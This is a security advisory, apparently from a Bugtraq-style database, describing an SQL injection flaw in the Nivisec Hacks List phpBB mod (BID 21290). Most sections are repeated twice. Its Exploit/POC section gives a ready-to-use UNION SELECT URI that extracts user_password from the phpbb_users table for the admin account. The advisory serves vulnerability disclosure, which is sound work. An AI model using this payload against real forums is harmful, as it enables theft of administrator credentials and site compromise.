Nivisec Hacks List HACK_ID SQL Injection Vulnerability
BID:21290
Info
Nivisec Hacks List HACK_ID SQL Injection Vulnerability
| Bugtraq ID: | 21290 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Nov 26 2006 12:00AM |
| Updated: | Nov 28 2006 09:40PM |
| Credit: | the master is credited with the discovery of this vulnerability. |
| Vulnerable: |
Nivisec Hacks List 1.2.1 |
| Not Vulnerable: | |
Discussion
Nivisec Hacks List HACK_ID SQL Injection Vulnerability
Hacks List phpBB Mod is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database implementation.
Hacks List 1.21 and prior versions are vulnerable to this issue.
Hacks List phpBB Mod is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database implementation.
Hacks List 1.21 and prior versions are vulnerable to this issue.
Exploit / POC
Nivisec Hacks List HACK_ID SQL Injection Vulnerability
An attacker can exploit this issue via a web client.
The following prof-of-concept URI is available:
http://example.com/admin/admin_hacks_list.php?mode=edit&hack_id=-99%20UNION%20SELECT%20null,null,user_password,null,null,null,null,null,null,null,null,null%20FROM%20phpbb_users%20Where%20user_id=2&sid=AdminHash
An attacker can exploit this issue via a web client.
The following prof-of-concept URI is available:
http://example.com/admin/admin_hacks_list.php?mode=edit&hack_id=-99%20UNION%20SELECT%20null,null,user_password,null,null,null,null,null,null,null,null,null%20FROM%20phpbb_users%20Where%20user_id=2&sid=AdminHash
Solution / Fix
Nivisec Hacks List HACK_ID SQL Injection Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected]:[email protected].
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected]:[email protected].